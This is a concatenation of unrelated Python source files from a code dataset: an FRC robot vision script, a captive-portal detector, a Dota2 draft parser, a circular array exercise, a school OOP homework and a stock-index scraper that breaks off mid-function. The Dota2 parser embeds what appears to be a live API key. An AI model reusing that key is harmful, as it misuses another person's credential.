rectangle dimensions\n x, y, w, h = cv.boundingRect(testContour)\n rect = cv.minAreaRect(testContour)\n a = rect[2]\n box = cv.boxPoints(rect)\n box = np.int0(box)\n cv.drawContours(imgRaw,[box],0,(0,0,255),2) \n\n #If large enough, draw a rectangle and store the values in the list\n if cv.contourArea(testContour) > minTargetArea:\n\n #cv.rectangle(imgRaw,(x,y),(x+w,y+h),(0,0,255),2)\n\n visionTargetTuple = (x, y, w, h, a)\n visionTargetValues.append(visionTargetTuple)\n\n #Only continue if two appropriately sized contours were found\n if len(visionTargetValues) > 1:\n\n #Sort the contours found into a left-to-right order (sorting by x-value)\n visionTargetValues.sort(key=itemgetter(0))\n\n #Compare each contour to the next-right-most contour to determine distance between them\n for i in range(len(visionTargetValues) - 1):\n\n #Create a conversion factor between inches and pixels with a known value (the target height)\n #and the height of the left-most contour found\n inchesPerPixel = visionTargetHeight/visionTargetValues[i][3]\n \n #Calculate the pixel difference between contours (right x - (left x + left width))\n diffTargets = visionTargetValues[i + 1][0] - (visionTargetValues[i][0] + visionTargetValues[i][2])\n \n #Check the distance against the expected angle with a tolerance, check the area, and store \n #the matched pairs in the indices list\n if visionTargetValues[i][4] < -65 and visionTargetValues[i+1][4] > -25:\n\n #Calculate area of region found (height * (left width + right width + diffTargets))\n regionHeight = visionTargetValues[i][3] #using left height\n regionWidth = visionTargetValues[i][2] + visionTargetValues[i + 1][2] + diffTargets\n regionArea = regionWidth * regionHeight\n\n #Check area and draw rectangle (for testing)\n if regionArea > minRegionArea:\n\n x = visionTargetValues[i][0]\n y = visionTargetValues[i][1]\n w = regionWidth\n h = regionHeight\n cv.rectangle(imgRaw,(x,y),(x+w,y+h),(0,0,255),1) \n \n visionRegionTuple = (regionArea, x, y, w, h)\n visionRegionValues.append(visionRegionTuple)\n \n #Only proceed if an appropriately sized merged region is found\n if len(visionRegionValues) > 0:\n\n #Sort the collected paired regions from largest area to smallest area (largest area is index 0)\n visionRegionValues.sort(key=itemgetter(0), reverse = True)\n\n #Assign final values to be returned\n targetX = visionRegionValues[0][1]\n targetY = visionRegionValues[0][2]\n targetW = visionRegionValues[0][3]\n targetH = visionRegionValues[0][4]\n\n centerOffset = (imgWidthVision / 2) - (targetX + (targetW / 2))\n\n foundVisionTarget = True\n \n distanceToVisionTarget = inchesPerPixel * (imgWidthVision / (2 * math.tan(math.radians(cameraFieldOfView))))\n offsetInInches = inchesPerPixel * ((targetX + targetW/2) - imgWidthVision / 2)\n angleToVisionTarget = math.degrees(math.atan((offsetInInches / distanceToVisionTarget)))\n\n #Return results\n return targetX, targetY, targetW, targetH, distanceToVisionTarget, angleToVisionTarget, centerOffset, foundVisionTarget\n\n\n#Define main processing function\ndef main():\n\n #Define global variables\n global imgWidthDriver\n global imgHeightDriver\n global imgWidthVision\n global imgHeightVision\n\n #Define local variables\n driverCameraBrightness = 50\n visionCameraBrightness = 0\n driverFramesPerSecond = 15\n visionFramesPerSecond = 30\n\n #Define local flags\n networkTablesConnected = False\n driverCameraConnected = False\n visionCameraConnected = False\n foundBall = False\n foundTape = False\n foundVisionTarget = False\n\n #Get current time as a string\n currentTime = time.localtime(time.time())\n timeString = str(currentTime.tm_year) + str(currentTime.tm_mon) + str(currentTime.tm_mday) + str(currentTime.tm_hour) + str(currentTime.tm_min)\n\n #Open a log file\n logFilename = '/data/Logs/Run_Log_' + timeString + '.txt'\n log_file = open(logFilename, 'w')\n log_file.write('run started on %s.\\n' % datetime.datetime.now())\n log_file.write('')\n\n #Load VMX module\n vmxpi = imp.load_source('vmxpi_hal_python', '/usr/local/lib/vmxpi/vmxpi_hal_python.py')\n vmx = vmxpi.VMXPi(False,50)\n if vmx.IsOpen() is False:\n log_file.write('Error: Unable to open VMX Client.\\n')\n log_file.write('\\n')\n log_file.write(' - Is pigpio (or the system resources it requires) in use by another process?\\n')\n log_file.write(' - Does this application have root privileges?')\n log_file.close()\n sys.exit(0)\n\n #Connect NetworkTables\n try:\n NetworkTables.initialize(server='10.41.21.2')\n visionTable = NetworkTables.getTable(\"vision\")\n navxTable = NetworkTables.getTable(\"navx\")\n smartDash = NetworkTables.getTable(\"SmartDashboard\")\n networkTablesConnected = True\n log_file.write('Connected to Networktables on 10.41.21.2 \\n')\n except:\n log_file.write('Error: Unable to connect to Network tables.\\n')\n log_file.write('Error message: ', sys.exec_info()[0])\n log_file.write('\\n')\n\n #Navx configuration\n navxTable.putNumber(\"ZeroGyro\", 0)\n #navxTable.putNumber(\"ZeroDisplace\", 0)\n\n #Reset yaw gyro\n vmx.getAHRS().Reset()\n vmx.getAHRS().ZeroYaw()\n\n #Reset displacement\n vmx.getAHRS().ResetDisplacement()\n\n #Set up a camera server\n camserv = CameraServer.getInstance()\n camserv.enableLogging\n\n #Start capturing webcam videos\n try:\n driverCameraPath = '/dev/v4l/by-path/platform-3f980000.usb-usb-0:1.5:1.0-video-index0'\n driverCamera = camserv.startAutomaticCapture(name = \"DriverCamera\", path=driverCameraPath)\n driverCamera.setResolution(imgWidthDriver, imgHeightDriver)\n driverCamera.setBrightness(driverCameraBrightness)\n driverCamera.setFPS(driverFramesPerSecond)\n driverCameraConnected = True\n log_file.write('Connected to driver camera on ID = 0.\\n')\n except:\n log_file.write('Error: Unable to connect to driver camera.\\n')\n log_file.write('Error message: ', sys.exec_info()[0])\n log_file.write('\\n')\n\n try:\n visionCameraPath = '/dev/v4l/by-path/platform-3f980000.usb-usb-0:1.4:1.0-video-index0'\n visionCamera = cs.UsbCamera(name=\"VisionCamera\", path=visionCameraPath)\n visionCamera.setResolution(imgWidthVision, imgHeightVision)\n visionCamera.setBrightness(visionCameraBrightness)\n visionCamera.setFPS(visionFramesPerSecond)\n visionCameraConnected = True\n except:\n log_file.write('Error: Unable to connect to vision camera.\\n')\n log_file.write('Error message: ', sys.exec_info()[0])\n log_file.write('\\n') \n\n #Define vision video sink\n if driverCameraConnected == True:\n driverSink = camserv.getVideo(name = 'DriverCamera')\n if visionCameraConnected == True:\n visionSink = cs.CvSink(name = 'VisionCamera')\n visionSink.setSource(visionCamera)\n\n #Define output stream for driver camera images\n if (driverCameraConnected == True):\n driverOutputStream = camserv.putVideo(\"DriveCamera\", imgWidthDriver, imgHeightDriver)\n \n #Define output stream for processed vision images (for testing only!)\n if (visionCameraConnected == True):\n visionOutputStream = camserv.putVideo(\"VisionCamera\", imgWidthVision, imgHeightVision)\n\n #Set video codec and create VideoWriter\n if writeVideo == True:\n fourcc = cv.VideoWriter_fourcc(*'XVID')\n videoFilename = '/data/Match_Videos/RobotVisionCam-' + timeString + '.mp4'\n visionImageOut = cv.VideoWriter(videoFilename,fourcc,visionFramesPerSecond,(imgWidthVision,imgHeightVision))\n\n #Create blank vision image\n imgDriver= np.zeros(shape=(imgWidthDriver, imgHeightDriver, 3), dtype=np.uint8)\n imgVision= np.zeros(shape=(imgWidthVision, imgHeightVision, 3), dtype=np.uint8)\n\n #Start main processing loop\n while (True):\n\n #Read in an image from 2019 Vision Images (for testing)\n #img = cv.imread('RetroreflectiveTapeImages2019/CargoStraightDark90in.jpg')\n #if img is None:\n # break\n\n #Initialize video time stamp\n visionVideoTimestamp = 0\n \n #Grab frames from the vision web camera\n if driverCameraConnected == True:\n driverVideoTimestamp, imgDriver = driverSink.grabFrame(imgDriver)\n if visionCameraConnected == True:\n visionVideoTimestamp, imgVision = visionSink.grabFrame(imgVision)\n\n #Check for frame errors\n visionFrameGood = True\n if (visionVideoTimestamp == 0) and (visionCameraConnected == True):\n log_file.write('Vision video error: \\n')\n log_file.write(visionSink.getError())\n log_file.write('\\n')\n visionFrameGood = False\n sleep (float(visionFramesPerSecond * 2) / 1000.0)\n continue\n\n #Put driver frame in output stream\n if (driverCameraConnected == True):\n driverOutputStream.putFrame(imgDriver)\n\n #Continue processing if we have no errors\n if (visionFrameGood == True):\n\n #Call detection methods\n ballX, ballY, ballRadius, ballDistance, ballAngle, ballOffset, ballScreenPercent, foundBall = detect_ball_target(imgVision)\n #tapeX, tapeY, tapeW, tapeH, tapeOffset, foundTape = detect_floor_tape(imgVision)\n visionTargetX, visionTargetY, visionTargetW, visionTargetH, visionTargetDistance, visionTargetAngle, visionTargetOffset, foundVisionTarget = detect_vision_targets(imgVision)\n\n #Update networktables and log file\n if networkTablesConnected == True:\n\n visionTable.putNumber(\"RobotStop\", 0)\n visionTable.putBoolean(\"WriteVideo\", writeVideo)\n\n visionTable.putNumber(\"BallX\", round(ballX, 2))\n visionTable.putNumber(\"BallY\", round(ballY, 2))\n visionTable.putNumber(\"BallRadius\", round(ballRadius, 2))\n visionTable.putNumber(\"BallDistance\", round(ballDistance, 2))\n visionTable.putNumber(\"BallAngle\", round(ballAngle, 2))\n visionTable.putNumber(\"BallOffset\", round(ballOffset, 2))\n visionTable.putNumber(\"BallScreenPercent\", round(ballScreenPercent, 2))\n visionTable.putBoolean(\"FoundBall\", foundBall)\n \n if foundBall == True:\n \n log_file.write('Cargo found at %s.\\n' % datetime.datetime.now())\n log_file.write(' Ball distance: %.2f \\n' % round(ballDistance, 2))\n log_file.write(' Ball angle: %.2f \\n' % round(ballAngle, 2))\n log_file.write(' Ball offset: %.2f \\n' % round(ballOffset, 2))\n log_file.write('\\n')\n\n if foundTape == True:\n visionTable.putNumber(\"TapeX\", round(tapeX, 2))\n visionTable.putNumber(\"TapeY\", round(tapeY, 2))\n visionTable.putNumber(\"TapeW\", round(tapeW, 2))\n visionTable.putNumber(\"TapeH\", round(tapeH, 2))\n visionTable.putNumber(\"TapeOffset\", round(tapeOffset, 2))\n visionTable.putBoolean(\"FoundTape\", foundTape)\n log_file.write('Floor tape found at %s.\\n' % datetime.datetime.now())\n log_file.write(' Tape offset: %.2f \\n' % round(tapeOffset, 2))\n log_file.write('\\n')\n\n\n visionTable.putNumber(\"VisionTargetX\", round(visionTargetX, 2))\n visionTable.putNumber(\"VisionTargetY\", round(visionTargetY, 2))\n visionTable.putNumber(\"VisionTargetW\", round(visionTargetW, 2))\n visionTable.putNumber(\"VisionTargetH\", round(visionTargetH, 2))\n visionTable.putNumber(\"VisionTargetDistance\", round(visionTargetDistance, 2))\n visionTable.putNumber(\"VisionTargetAngle\", round(visionTargetAngle, 2))\n visionTable.putNumber(\"VisionTargetOffset\", round(visionTargetOffset, 2))\n visionTable.putBoolean(\"FoundVisionTarget\", foundVisionTarget)\n\n if foundVisionTarget == True:\n \n log_file.write('Vision target found at %s.\\n' % datetime.datetime.now())\n log_file.write(' Vision target distance: %.2f \\n' % round(visionTargetDistance, 2))\n log_file.write(' Vision target angle: %.2f \\n' % round(visionTargetAngle, 2))\n log_file.write(' Vision target offset: %.2f \\n' % round(visionTargetOffset, 2))\n log_file.write('\\n')\n\n #Draw various contours on the image\n if foundBall == True:\n cv.circle(imgVision, (int(ballX), int(ballY)), int(ballRadius), (0, 255, 0), 2) #ball\n cv.putText(imgVision, 'Distance to Ball: %.2f' %ballDistance, (320, 400), cv.FONT_HERSHEY_SIMPLEX, .75,(0, 0, 255), 2)\n cv.putText(imgVision, 'Angle to Ball: %.2f' %ballAngle, (320, 440), cv.FONT_HERSHEY_SIMPLEX, .75,(0, 0, 255), 2) \n if foundTape == True:\n cv.rectangle(imgVision,(tapeX,tapeY),(tapeX+tapeW,tapeY+tapeH),(100,0,255),1) #floor tape\n if foundVisionTarget == True:\n cv.rectangle(imgVision,(visionTargetX,visionTargetY),(visionTargetX+visionTargetW,visionTargetY+visionTargetH),(0,255,0),2) #vision targets\n cv.putText(imgVision, 'Distance to Vision: %.2f' %visionTargetDistance, (10, 400), cv.FONT_HERSHEY_SIMPLEX, .75,(0, 255, 0), 2)\n cv.putText(imgVision, 'Angle to Vision: %.2f' %visionTargetAngle, (10, 440), cv.FONT_HERSHEY_SIMPLEX, .75,(0, 255, 0), 2)\n\n #Put timestamp on image\n cv.putText(imgVision, str(datetime.datetime.now()), (10, 30), cv.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 255), 2)\n\n #Update navx network table\n if networkTablesConnected == True:\n navxTable.putNumber(\"GyroAngle\", round(vmx.getAHRS().GetAngle(), 2))\n navxTable.putNumber(\"GyroYaw\", round(vmx.getAHRS().GetYaw(), 2))\n navxTable.putNumber(\"GyroPitch\", round(vmx.getAHRS().GetPitch(), 2))\n navxTable.putNumber(\"YVelocity\", round(vmx.getAHRS().GetVelocityY(), 4))\n navxTable.putNumber(\"XVelocity\", round(vmx.getAHRS().GetVelocityX(), 4))\n navxTable.putNumber(\"YDisplacement\", round(vmx.getAHRS().GetDisplacementY(), 4))\n navxTable.putNumber(\"XDisplacement\", round(vmx.getAHRS().GetDisplacementX(), 4))\n navxTable.putNumber(\"YVelocity\", round(vmx.getAHRS().GetVelocityY(), 4))\n navxTable.putNumber(\"XVelocity\", round(vmx.getAHRS().GetVelocityX(), 4))\n navxTable.putNumber(\"YAccel\", round(vmx.getAHRS().GetWorldLinearAccelY(), 4))\n navxTable.putNumber(\"XAccel\", round(vmx.getAHRS().GetWorldLinearAccelX(), 4))\n\n #Check vision network table dashboard value\n sendVisionToDashboard = visionTable.getNumber(\"SendVision\", 0)\n\n #Send vision to dashboard (for testing)\n if (visionCameraConnected == True) and (sendVisionToDashboard == 1):\n visionOutputStream.putFrame(imgVision)\n \n #Write processed image to file\n if (writeVideo == True) and (visionCameraConnected == True):\n visionImageOut.write(imgVision)\n\n #Display the vision camera stream (for testing only)\n #cv.imshow(\"Vision\", imgVision)\n\n #Check for gyro re-zero\n gyroInit = navxTable.getNumber(\"ZeroGyro\", 0)\n if gyroInit == 1:\n vmx.getAHRS().Reset()\n vmx.getAHRS().ZeroYaw()\n navxTable.putNumber(\"ZeroGyro\", 0)\n\n #Check for displacement zero\n #dispInit = navxTable.getNumber(\"ZeroDisplace\", 0)\n #if dispInit == 1:\n # vmx.getAHRS().ResetDisplacement()\n # navxTable.putNumber(\"ZeroDisplace\", 0)\n \n #Check for stop code from robot or keyboard (for testing)\n #if cv.waitKey(1) == 27:\n # break\n robotStop = visionTable.getNumber(\"RobotStop\", 0)\n if (robotStop == 1) or (visionCameraConnected == False) or (networkTablesConnected == False):\n break\n\n\n #Close all open windows (for testing)\n #cv.destroyAllWindows()\n\n #Close video file\n visionImageOut.release()\n\n #Close the log file\n log_file.write('Run stopped on %s.' % datetime.datetime.now())\n log_file.close()\n \n\n#define main function\nif __name__ == '__main__':\n main()\n","sub_path":"Team4121VisionMotion2019Rev2.py","file_name":"Team4121VisionMotion2019Rev2.py","file_ext":"py","file_size_in_byte":27213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"4119839","text":"\"\"\"Detects whether this system is behind a captive gateway\n\nMany public WiFi hotspots utilize a captive gateway that redirects all\nHTTP traffic to a gateway page (and blocks all non-HTTP traffic) until\na user agreement on said page is agreed to. This module can detect\nwhether this system is currently behind a captive gateway, and provide\nthe URL of the gateway page.\n\"\"\"\n\nimport urllib2\n\nVERSION = '0.1'\n\ndef is_captive():\n \"\"\"True if this system is behind a captive gateway; False otherwise.\"\"\"\n return get_portal_url() != None\n\ndef get_portal_url():\n \"\"\"If this system is behind a captive gateway, returns the URL of\n the gateway page as a String; otherwise, returns None.\"\"\"\n try:\n # The IANA's website should hopefully always be up.\n test_url = 'http://www.iana.org/'\n url = urllib2.urlopen(test_url).geturl()\n if url != test_url:\n return url\n else:\n return None\n except urllib2.URLError:\n return None\n","sub_path":"captivedetect.py","file_name":"captivedetect.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"301692219","text":"from __future__ import print_function\nimport time\nimport dota2api\nimport od_python\nimport json\nfrom od_python.rest import ApiException\nfrom pprint import pprint\n# create an instance of the API class\napi_instance = od_python.MatchesApi()\n\njson_data = open('data.json').read()\ndata = json.loads(json_data)\n\ndota_api = dota2api.Initialise(\"55D5E24E25F8BE9CD06760ED7F0F9BE6\")\n\ndef id_parse(data):\n\tprev_id = 0\n\tmatches = []\n\tfor match in data:\n\t\tif match['match_id'] != prev_id:\n\t\t\tprev_id = match['match_id']\n\t\t\tmatches.append(prev_id)\n\n\tprint('%d matches parsed' % len(matches))\n\treturn matches\n\n\ndef match_parse(matches):\n\tparsed_matches = []\n\t#counter = 0\n\tfor match in matches:\n\t\tapi_response = api_instance.matches_match_id_get(match)\n\t\tpprint(api_response.draft_timings[0])\n\t\tentry = {'draft' : api_response.draft_timings, 'win' : api_response.radiant_win}\n\t\tparsed_matches.append(entry)\n\t\t#pprint(entry)\n\t\ttime.sleep(1) #rate limit exceeded\n\t\t#draft_parse(entry['draft'])\n\t\t#break\n\treturn parsed_matches\n\ndef draft_parse(draft_timings):\n\tfor pick in draft_timings:\n\t\tpprint(pick)\n\t\t\n\ntry:\n # GET /benchmarks\n matches = id_parse(data)\n pprint(matches)\n parsed_matches = match_parse(matches)\n with open('drafts.json', 'w') as outfile:\n \toutfile.write(\"%s\" % parsed_matches)\n\nexcept ApiException as e:\n print(\"Exception when calling dota2api: %s\\n\" % e)\n","sub_path":"RNN/parse_matches.py","file_name":"parse_matches.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"441632705","text":"class Solution:\n def findUnsortedSubarray(self, nums: List[int]) -> int:\n if len(nums)<2:\n return 0\n \n low = 0\n high = len(nums) - 1\n \n while low0 and nums[high]>nums[high-1]:\n high -= 1\n \n if low>high:\n return 0\n \n tmpMin,tmpMax = min(nums[low:high+1]),max(nums[low:high+1])\n \n while low>0 and tmpMinnums[high+1]:\n high += 1\n \n return high-low+1\n","sub_path":"Python/581_Shortest_Unsorted_Continuous_Subarray.py","file_name":"581_Shortest_Unsorted_Continuous_Subarray.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"416891934","text":"import logging\n\n\ndef log(func):\n\n def wrapper(*args, **kwargs):\n logger.info(\"Program started\")\n res = func(*args, **kwargs)\n logger.info(\"Done!\")\n return res\n\n return wrapper\n\n\nlogger = logging.getLogger('test_log')\n\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(module)s - %(funcName)s - %(message)s')\nfn = logging.FileHandler('log_task_1.log')\nfn.setLevel(logging.DEBUG)\nfn.setFormatter(formatter)\n\nlogger.addHandler(fn)\nlogger.setLevel(logging.DEBUG)\n","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"209793461","text":"\"\"\"Implement a Circular Array\n\nA circular array is defined by having a start and indexes (be\nsure to think about optimizing runtime for indexing)::\n\n >>> circ = CircularArray()\n >>> circ.add_item('harry')\n >>> circ.add_item('hermione')\n >>> circ.add_item('ginny')\n >>> circ.add_item('ron')\n >>> circ.print_array()\n harry\n hermione\n ginny\n ron\n >>> circ.get_by_index(2)\n 'ginny'\n >>> print(circ.get_by_index(15))\n None\n\nHowever, the last item circles back around to the first item, \nso you can also rotate the list and shift the indexes. Positive\nnumbers rotate the list start to the right (or higher indexes)::\n\n >>> circ = CircularArray()\n >>> circ.add_item('harry')\n >>> circ.add_item('hermione')\n >>> circ.add_item('ginny')\n >>> circ.add_item('ron')\n >>> circ.rotate(1)\n >>> circ.print_array()\n hermione\n ginny\n ron\n harry\n >>> circ.get_by_index(2)\n 'ron'\n\nAnd negative numbers rotate the list start to the left (or lower\nindexes)::\n\n >>> circ = CircularArray()\n >>> circ.add_item('harry')\n >>> circ.add_item('hermione')\n >>> circ.add_item('ginny')\n >>> circ.add_item('ron')\n >>> circ.rotate(-1)\n >>> circ.print_array()\n ron\n harry\n hermione\n ginny\n >>> circ.get_by_index(2)\n 'hermione'\n\nAnd you can also rotate more than once around the ring::\n\n >>> circ = CircularArray()\n >>> circ.add_item('harry')\n >>> circ.add_item('hermione')\n >>> circ.add_item('ginny')\n >>> circ.add_item('ron')\n >>> circ.rotate(-17)\n >>> circ.get_by_index(1)\n 'harry'\n\nIf you add a new item after rotating, it should go at the end of\nthe list in its current rotation::\n\n >>> circ = CircularArray()\n >>> circ.add_item('harry')\n >>> circ.add_item('hermione')\n >>> circ.add_item('ginny')\n >>> circ.add_item('ron')\n >>> circ.rotate(-2)\n >>> circ.add_item('dobby')\n >>> circ.print_array()\n ginny\n ron\n harry\n hermione\n dobby\n\n\"\"\"\n\n\nclass CircularArray(object):\n \"\"\"An array that may be rotated, and items retrieved by index\"\"\"\n\n def __init__(self):\n \"\"\"Instantiate CircularArray.\"\"\"\n self.items = []\n self.length = 0\n\n def add_item(self, item):\n \"\"\"Add item to array, at the end of the current rotation.\"\"\"\n self.items.append(item)\n self.length += 1\n\n def get_by_index(self, index):\n \"\"\"Return the data at a particular index.\"\"\"\n if index > self.length - 1:\n return None\n else:\n return self.items[index]\n\n def rotate(self, increment):\n \"\"\"Rotate array, positive for right, negative for left.\n\n If increment is greater than list length, keep going around.\n \"\"\"\n\n shift = increment % self.length\n # result = self.items * 2\n # self.items = result[shift:shift + self.length]\n\n result = [None for i in range(self.length)]\n for i in range(self.length):\n index = ((i - shift) % self.length)\n result[index] = self.items[i]\n\n self.items = result\n\n def print_array(self):\n \"\"\"Print the circular array items in order, one per line\"\"\"\n for item in self.items:\n print(item)\n\n\nif __name__ == \"__main__\":\n print()\n import doctest\n\n if doctest.testmod().failed == 0:\n print(\"*** ALL TESTS PASSED; YOU MUST BE DIZZY WITH JOY! ***\")\n print()\n","sub_path":"MEDIUM/circular-array/circular_array.py","file_name":"circular_array.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"365247480","text":"# Задание-1:\n# Реализуйте описаную ниже задачу, используя парадигмы ООП:\n# В школе есть Классы(5А, 7Б и т.д.), в которых учатся Ученики.\n# У каждого ученика есть два Родителя(мама и папа).\n# Также в школе преподают Учителя. Один учитель может преподавать \n# в неограниченном кол-ве классов свой определенный предмет. \n# Т.е. Учитель Иванов может преподавать математику у 5А и 6Б,\n# но больше математику не может преподавать никто другой.\n\n\n\n# Выбранная и заполненная данными структура должна решать следующие задачи:\n# 1. Получить полный список всех классов школы\n# 2. Получить список всех учеников в указанном классе\n# (каждый ученик отображается в формате \"Фамилия И.О.\")\n# 3. Получить список всех предметов указанного ученика \n# (Ученик --> Класс --> Учителя --> Предметы)\n# 4. Узнать ФИО родителей указанного ученика\n# 5. Получить список всех Учителей, преподающих в указанном классе\n\nclass ClassRoom:\n def __init__(self, class_room):\n self.class_room = class_room\n\nclass Person:\n def __init__(self, name, surname, father_name):\n self.name = name\n self.surname = surname\n self.father_name = father_name\n\n def get_ini_name(self):\n return '{} {}.{}.'.format(self.surname.title(), self.name[0].upper(), self.father_name[0].upper())\n\n\nclass Student(Person):\n def __init__(self, name, surname, father_name, class_room, father, mother):\n Person.__init__(self, name, surname, father_name)\n self.class_room = class_room\n self.father = father\n self.mother = mother\n\n def get_class_room(self):\n return self.class_room\n\n def get_parents(self):\n return self.father.get_ini_name(), self.mother.get_ini_name()\n\nclass Teacher(Person):\n def __init__(self, name, surname, father_name, classes, subject):\n Person.__init__(self, name, surname, father_name)\n self.classes = classes\n self.subject = subject\n\n def get_subject(self):\n return self.subject\n\n def get_classes(self):\n return self.classes\n\n# задаем данные\n\n\nclass_rooms = ['5А', '6А', '7А', '8А', '9А']\n\nparents = [Person(\"Иван\", \"Петров\", \"Александрович\"),\n Person(\"Татьяна\", \"Петрова\", \"Александровна\"),\n Person(\"Игорь\", \"Сидоров\", \"Александрович\"),\n Person(\"Оксана\", \"Сидорова\", \"Александровна\"),\n Person(\"Виталий\", \"Иванов\", \"Александрович\"),\n Person(\"Милана\", \"Иванова\", \"Александровна\")]\n\nstudents = [Student(\"Александр\", \"Иванов\", \"Витальевич\", class_rooms[2], parents[4], parents[5]),\n Student(\"Александра\", \"Иванова\", \"Витальевна\", class_rooms[0], parents[4], parents[5]),\n Student(\"Петр\", \"Сидоров\", 'Игоревич', class_rooms[1], parents[2], parents[3]),\n Student(\"Октябрина\", \"Сидорова\", 'Игоревна', class_rooms[3], parents[2], parents[3]),\n Student(\"Иван\", \"Петров\", 'Иванович', class_rooms[4], parents[0], parents[1]),\n Student(\"Илона\", \"Петрова\", 'Ивановна', class_rooms[2], parents[0], parents[1])]\n\nteachers = [Teacher(\"Феофан\", \"Грек\", \"Батькович\", [class_rooms[0], class_rooms[1]], 'Русский язык'),\n Teacher(\"Андрей\", \"Зырянов\", \"Александрович\", [class_rooms[2], class_rooms[1]], 'История'),\n Teacher(\"Ульянв\", \"Харитонова\", \"Яковлевна\", [class_rooms[3], class_rooms[4]], 'Литература')]\n\n # 1. Получить полный список всех классов школы\nprint('Полный список всех классов школы: ')\nprint('class_rooms ', class_rooms)\n\n # 2. Получить список всех учеников в указанном классе\n # (каждый ученик отображается в формате \"Фамилия И.О.\")\nprint(\"Список всех учеников в указанном классе: \")\nfor num, student in enumerate(students, start=1):\n print(\"{}) {} класс: {}\".format(num, student.get_ini_name(), student.class_room))\n\n # 3. Получить список всех предметов указанного ученика\n # (Ученик --> Класс --> Учителя --> Предметы)\n\nstudent = students[0]\nt_list = [val for val in teachers if student.get_class_room() in val.get_classes()]\nt_names = [val.get_ini_name() for val in t_list]\nsubj = [val.get_subject() for val in teachers]\nprint(student.get_ini_name() + ' --> ' + student.get_class_room() + ' --> ' + ' '.join(map(str, t_names)) + '--> ' + ' '.join(map(str, subj)))\n\n # 4. Узнать ФИО родителей указанного ученика\nst_parents = student.get_parents()\nprint('Родители ученика ', student.get_ini_name(), ' ', st_parents)\n\n # 5. Получить список всех Учителей, преподающих в указанном классе\nprint('Учителя, преподающие в классе:')\nfor num, teacher in enumerate(teachers, start=1):\n print(\"{}) {} класс: {}\".format(num, teacher.get_ini_name(), teacher.classes))\n","sub_path":"lesson06/home_work/hw06_normal.py","file_name":"hw06_normal.py","file_ext":"py","file_size_in_byte":6085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"535420349","text":"# coding: utf-8\n# 生成小明写稿 股票信息。2017.7.25\nimport datetime\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom datetime import datetime\nimport hashlib\nimport logging\n\nPHANTOMJS_PATH = 'D:\\\\tk\\\\Phantojs\\\\phantomjs-2.1.1-windows\\\\bin\\\\phantomjs'\n\n# 获取沪指 各项指数(开盘价, 收盘价等)\ndef getHuZhiAllInformation():\n try:\n url = 'http://news.stockdata.cs.com.cn/hqcenter/htmls/qcenter/singleStock/singleIndex.html?code=1A0001'\n driver = webdriver.PhantomJS(PHANTOMJS_PATH)\n driver.get(url)\n # time.sleep(1)\n time.sleep(5)\n result = []\n try:\n element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, \"minPrice\")))\n except Exception as e:\n print('28')\n print(e)\n logging.error(e)\n finally:\n newPrice = driver.find_element_by_id('newPrice').text\n changePrice = driver.find_element_by_id('zd').text.split('(')[0]\n changePercent = driver.find_element_by_id('zd').text.split('(')[1].split(')')[0]\n openIndex = driver.find_element_by_id('open').text\n yesterday = driver.find_element_by_id('preClose').text\n maxPrice = driver.find_element_by_id('maxPrice').text\n minPrice = driver.find_element_by_id('minPrice').text\n totalAmount = driver.find_element_by_id('totalAmount').text\n begin = totalAmount.index(':') + 1\n end = totalAmount.index('(')\n result.append(newPrice)\n result.append(changePrice)\n result.append(changePercent)\n result.append(openIndex)\n result.append(yesterday)\n result.append(maxPrice)\n result.append(minPrice)\n result.append(totalAmount[begin:end])\n # print(result)\n driver.close()\n except Exception as e:\n print('54')\n print(e)\n logging.error(e)\n return result\n\n# 获取深指 各项指数(开盘价, 收盘价等)\ndef getShenZhiAllInformation():\n try:\n url = 'http://news.stockdata.cs.com.cn/hqcenter/htmls/qcenter/singleStock/singleIndex.html?code=2A01'\n driver = webdriver.PhantomJS(PHANTOMJS_PATH)\n driver.get(url)\n time.sleep(5)\n result = []\n try:\n element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, \"minPrice\")))\n except Exception as e:\n print(e)\n logging.error(e)\n finally:\n newPrice = driver.find_element_by_id('newPrice').text\n changePrice = driver.find_element_by_id('zd').text.split('(')[0]\n changePercent = driver.find_element_by_id('zd').text.split('(')[1].split(')')[0]\n openIndex = driver.find_element_by_id('open').text\n yesterday = driver.find_element_by_id('preClose').text\n maxPrice = driver.find_element_by_id('maxPrice').text\n minPrice = driver.find_element_by_id('minPrice').text\n totalAmount = driver.find_element_by_id('totalAmount').text\n begin = totalAmount.index(':') + 1\n end = totalAmount.index('(')\n result.append(newPrice)\n result.append(changePrice)\n result.append(changePercent)\n result.append(openIndex)\n result.append(yesterday)\n result.append(maxPrice)\n result.append(minPrice)\n result.append(totalAmount[begin:end])\n driver.close()\n # print(result)\n except Exception as e:\n print('94')\n print(e)\n logging.error(e)\n\n return result\n\n# 获取 沪A 深A 创业板 中小板 涨幅前五排名\ndef getAllTop5():\n try:\n url = 'http://news.stockdata.cs.com.cn/hqcenter/htmls/qcenter/index.html'\n\n driver = webdriver.PhantomJS(PHANTOMJS_PATH)\n driver.get(url)\n time.sleep(7)\n driver.switch_to.frame('main')\n time.sleep(5)\n tmp = driver.find_element_by_id('tab_body_rise').text.split('\\n')[:5]\n result = []\n l1 = []\n l2 = []\n l3 = []\n l4 = []\n for i in tmp:\n gegulist = i.split(' ')\n 